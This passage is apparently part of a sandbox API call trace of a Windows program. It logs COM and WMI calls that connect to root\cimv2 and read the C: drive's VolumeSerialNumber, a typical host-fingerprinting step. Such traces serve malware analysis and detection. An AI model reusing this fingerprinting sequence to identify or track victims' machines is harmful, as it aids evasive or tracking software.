[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.924] WbemDefPath:IUnknown:Release (This=0x66ccd78) returned 0x3 [0198.924] CoGetContextToken (in: pToken=0x691e348 | out: pToken=0x691e348) returned 0x0 [0198.924] CoGetContextToken (in: pToken=0x691e750 | out: pToken=0x691e750) returned 0x0 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e7e0 | out: ppvObject=0x691e7e0*=0x0) returned 0x80004002 [0198.924] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0198.924] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0198.925] CoGetContextToken (in: pToken=0x691f0d8 | out: pToken=0x691f0d8) returned 0x0 [0198.925] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0198.925] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x691f108*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f104 | out: ppvObject=0x691f104*=0x60314a0) returned 0x0 [0198.925] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0198.925] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0198.925] WbemDefPath:IWbemPath:SetText (This=0x60314a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x691f28c | out: puCount=0x691f28c*=0x0) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f288*=0x0, pszText=0x0 | out: puBuffLength=0x691f288*=0x20, pszText=0x0) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f288*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f288*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x691f28c | out: puCount=0x691f28c*=0x0) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x691f20c | out: puCount=0x691f20c*=0x0) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f1f8 | out: puCount=0x691f1f8*=0x2) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f4*=0xf, pszText=0x0) returned 0x0 [0198.925] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f1f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.925] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1a8 | out: ppv=0x691f1a8*=0xb51e34) returned 0x0 [0198.925] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1a0 | out: pAptType=0x691f1a0*=1) returned 0x0 [0198.925] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1a4 | out: ppvObject=0x691f1a4*=0x0) returned 0x80004002 [0198.925] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.926] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb10 | out: ppv=0x691eb10*=0x6027920) returned 0x0 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027920, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed28 | out: ppvObject=0x691ed28*=0x0) returned 0x80004002 [0198.926] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027920, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed3c | out: ppvObject=0x691ed3c*=0x6031510) returned 0x0 [0198.926] WbemDefPath:IUnknown:Release (This=0x6027920) returned 0x0 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e95c | out: ppvObject=0x691e95c*=0x6031510) returned 0x0 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e918 | out: ppvObject=0x691e918*=0x0) returned 0x80004002 [0198.926] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e224 | out: ppvObject=0x691e224*=0x0) returned 0x80004002 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e230 | out: ppvObject=0x691e230*=0xbb5888) returned 0x0 [0198.926] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5888, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e238 | out: pCid=0x691e238*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.926] WbemDefPath:IUnknown:Release (This=0xbb5888) returned 0x3 [0198.926] CoGetContextToken (in: pToken=0x691e290 | out: pToken=0x691e290) returned 0x0 [0198.926] CoGetContextToken (in: pToken=0x691e698 | out: pToken=0x691e698) returned 0x0 [0198.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e728 | out: ppvObject=0x691e728*=0x0) returned 0x80004002 [0198.927] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0198.927] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0198.927] CoGetContextToken (in: pToken=0x691f020 | out: pToken=0x691f020) returned 0x0 [0198.927] CoGetContextToken (in: pToken=0x691ef80 | out: pToken=0x691ef80) returned 0x0 [0198.927] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x691f050*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f04c | out: ppvObject=0x691f04c*=0x6031510) returned 0x0 [0198.927] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0198.927] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0198.927] WbemDefPath:IWbemPath:SetText (This=0x6031510, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.927] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x691f1d0 | out: puCount=0x691f1d0*=0x2) returned 0x0 [0198.927] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x691f1cc*=0x0, pszText=0x0 | out: puBuffLength=0x691f1cc*=0xf, pszText=0x0) returned 0x0 [0198.927] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x691f1cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.927] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1d0 | out: ppv=0x691f1d0*=0xb51e34) returned 0x0 [0198.927] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1c8 | out: pAptType=0x691f1c8*=1) returned 0x0 [0198.927] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1cc | out: ppvObject=0x691f1cc*=0x0) returned 0x80004002 [0198.927] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.928] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691edf0 | out: ppv=0x691edf0*=0x6024a40) returned 0x0 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f008 | out: ppvObject=0x691f008*=0x0) returned 0x80004002 [0198.928] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024a40, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f01c | out: ppvObject=0x691f01c*=0x6027650) returned 0x0 [0198.928] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x0 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec3c | out: ppvObject=0x691ec3c*=0x6027650) returned 0x0 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebf8 | out: ppvObject=0x691ebf8*=0x0) returned 0x80004002 [0198.928] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e504 | out: ppvObject=0x691e504*=0x0) returned 0x80004002 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e510 | out: ppvObject=0x691e510*=0x0) returned 0x80004002 [0198.928] CoGetContextToken (in: pToken=0x691e570 | out: pToken=0x691e570) returned 0x0 [0198.928] CoGetContextToken (in: pToken=0x691e978 | out: pToken=0x691e978) returned 0x0 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea08 | out: ppvObject=0x691ea08*=0x0) returned 0x80004002 [0198.928] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0198.928] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0198.928] CoGetContextToken (in: pToken=0x691efe8 | out: pToken=0x691efe8) returned 0x0 [0198.928] CoGetContextToken (in: pToken=0x691ef48 | out: pToken=0x691ef48) returned 0x0 [0198.928] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x691f018*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f014 | out: ppvObject=0x691f014*=0x6027650) returned 0x0 [0198.928] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0198.928] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0198.928] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x691f1ac | out: puCount=0x691f1ac*=0x2) returned 0x0 [0198.928] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x691f1a8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1a8*=0xf, pszText=0x0) returned 0x0 [0198.928] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x691f1a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.929] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f084 | out: ppv=0x691f084*=0x60271e0) returned 0x0 [0198.929] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f118 | out: ppNamespace=0x691f118*=0x60336e4) returned 0x0 [0199.246] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efb4 | out: ppvObject=0x691efb4*=0xb5b224) returned 0x0 [0199.246] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b224, pProxy=0x60336e4, pAuthnSvc=0x691f004, pAuthzSvc=0x691f000, pServerPrincName=0x691eff8, pAuthnLevel=0x691effc, pImpLevel=0x691efec, pAuthInfo=0x691eff0, pCapabilites=0x691eff4 | out: pAuthnSvc=0x691f004*=0xa, pAuthzSvc=0x691f000*=0x0, pServerPrincName=0x691eff8, pAuthnLevel=0x691effc*=0x6, pImpLevel=0x691efec*=0x2, pAuthInfo=0x691eff0, pCapabilites=0x691eff4*=0x1) returned 0x0 [0199.246] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x1 [0199.246] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efa8 | out: ppvObject=0x691efa8*=0xb5b244) returned 0x0 [0199.246] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efa4 | out: ppvObject=0x691efa4*=0xb5b224) returned 0x0 [0199.246] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b224, pProxy=0x60336e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0199.247] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x2 [0199.247] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0199.247] CoTaskMemFree (pv=0xbd4858) [0199.247] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x0 [0199.247] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eba4 | out: ppvObject=0x691eba4*=0xb5b244) returned 0x0 [0199.247] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691eb60 | out: ppvObject=0x691eb60*=0x0) returned 0x80004002 [0199.247] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e97c | out: ppvObject=0x691e97c*=0x0) returned 0x80004002 [0199.248] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0199.248] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0199.248] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e46c | out: ppvObject=0x691e46c*=0x0) returned 0x80004002 [0199.249] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e478 | out: ppvObject=0x691e478*=0xb5b1a4) returned 0x0 [0199.249] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b1a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e480 | out: pCid=0x691e480*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.249] WbemLocator:IUnknown:Release (This=0xb5b1a4) returned 0x3 [0199.249] CoGetContextToken (in: pToken=0x691e4d8 | out: pToken=0x691e4d8) returned 0x0 [0199.249] CoGetContextToken (in: pToken=0x691e8e0 | out: pToken=0x691e8e0) returned 0x0 [0199.249] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e970 | out: ppvObject=0x691e970*=0xb5b22c) returned 0x0 [0199.249] WbemLocator:IRpcOptions:Query (in: This=0xb5b22c, pPrx=0xb5b244, dwProperty=2, pdwValue=0x691e998 | out: pdwValue=0x691e998) returned 0x80004002 [0199.249] WbemLocator:IUnknown:Release (This=0xb5b22c) returned 0x3 [0199.249] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0199.249] CoGetContextToken (in: pToken=0x691eeb8 | out: pToken=0x691eeb8) returned 0x0 [0199.249] CoGetContextToken (in: pToken=0x691ee18 | out: pToken=0x691ee18) returned 0x0 [0199.249] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x691eee8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691eee4 | out: ppvObject=0x691eee4*=0x60336e4) returned 0x0 [0199.249] WbemLocator:IUnknown:AddRef (This=0x60336e4) returned 0x4 [0199.249] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x3 [0199.249] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x2 [0199.250] SysStringLen (param_1=0x0) returned 0x0 [0199.250] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x691f27c | out: puCount=0x691f27c*=0x0) returned 0x0 [0199.250] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f278*=0x0, pszText=0x0 | out: puBuffLength=0x691f278*=0x20, pszText=0x0) returned 0x0 [0199.250] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f278*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f278*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.250] CoGetContextToken (in: pToken=0x691eee8 | out: pToken=0x691eee8) returned 0x0 [0199.250] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0199.250] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed7c | out: ppvObject=0x691ed7c*=0xb5b244) returned 0x0 [0199.250] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x3 [0199.250] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0199.250] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0x20, pszText=0x0) returned 0x0 [0199.250] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x691f280*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f280*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.250] IWbemServices:GetObject (in: This=0x60336e4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f234*=0x0, ppCallResult=0x0 | out: ppObject=0x691f234*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0199.309] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x691f234 | out: puCount=0x691f234*=0x2) returned 0x0 [0199.309] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x691f230*=0x0, pszText=0x0 | out: puBuffLength=0x691f230*=0xf, pszText=0x0) returned 0x0 [0199.309] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x691f230*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f230*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.309] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37432a8*=0, plFlavor=0x37432ac*=0 | out: pVal=0x691f230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37432a8*=8, plFlavor=0x37432ac*=0) returned 0x0 [0199.309] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.309] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.309] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37432a8*=8, plFlavor=0x37432ac*=0 | out: pVal=0x691f238*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37432a8*=8, plFlavor=0x37432ac*=0) returned 0x0 [0199.309] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.309] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.309] GetFullPathNameW (in: 